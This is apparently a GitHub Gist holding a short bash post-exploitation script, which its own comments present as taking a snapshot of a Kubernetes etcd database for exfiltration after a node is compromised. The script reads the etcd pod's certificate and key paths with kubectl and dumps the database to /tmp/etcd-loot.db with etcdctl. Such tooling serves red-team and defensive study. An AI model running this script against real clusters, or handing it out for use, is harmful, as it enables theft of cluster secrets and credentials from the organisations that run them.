Created
June 7, 2024 19:25
-
-
Save grahamhelton/0740e1fc168f241d1286744a61a1e160 to your computer and use it in GitHub Desktop.
Quick bash script to steal an etcd database
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script attempts to take a snapshot of the kubernetes etcd database for exfiltration | |
| # This should be run post-compromise of a node | |
| #!/usr/bin/env bash | |
| NOCOLOR=$(tput sgr0) | |
| RED=$(tput setaf 1) | |
| GREEN=$(tput setaf 2) | |
| BLUE=$(tput setaf 4) | |
| YELLOW=$(tput setaf 3) | |
| TICK="$NOCOLOR[$GREEN+$NOCOLOR] " | |
| TICK_ERROR="$NOCOLOR[$RED!$NOCOLOR] " | |
| echo -n $TICK"Checking for etcd pod name in$BLUE kube-system$NOCOLOR namespace... " | |
| ETCD_NAME=$(kubectl get pods -n kube-system | grep etcd | awk '{print $1}') | |
| echo $YELLOW $ETCD_NAME | |
| ETCD_INFO=$(kubectl describe pod -n kube-system $ETCD_NAME) | |
| ETCD_CACERT=$(echo "$ETCD_INFO" | grep '\--trusted-ca-file'| cut -d"=" -f 2) | |
| ETCD_SERVERCERT=$(echo "$ETCD_INFO" | grep '\--cert-file' | cut -d"=" -f 2) | |
| ETCD_KEY=$(echo "$ETCD_INFO" | grep '\--key-file' | cut -d"=" -f 2) | |
| echo $TICK"Attempting to save etcd databse snapshot to $BLUE/tmp/etcd-loot.db"$NOCOLOR | |
| ETCDCTL_API=3 etcdctl --cacert=$ETCD_CACERT --cert=$ETCD_SERVERCERT --key=$ETCD_KEY snapshot save /tmp/etcd-loot.db | |
| if [ $? -eq 0 ];then | |
| echo $TICK"Etcd snapshot success, stored in $BLUE/tmp/etcd-loot.db!"$NOCOLOR | |
| else | |
| echo $TICK_ERROR$RED"Failed to take snapshot of etcd database!"$NOCOLOR | |
| fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Running this on a lab node:
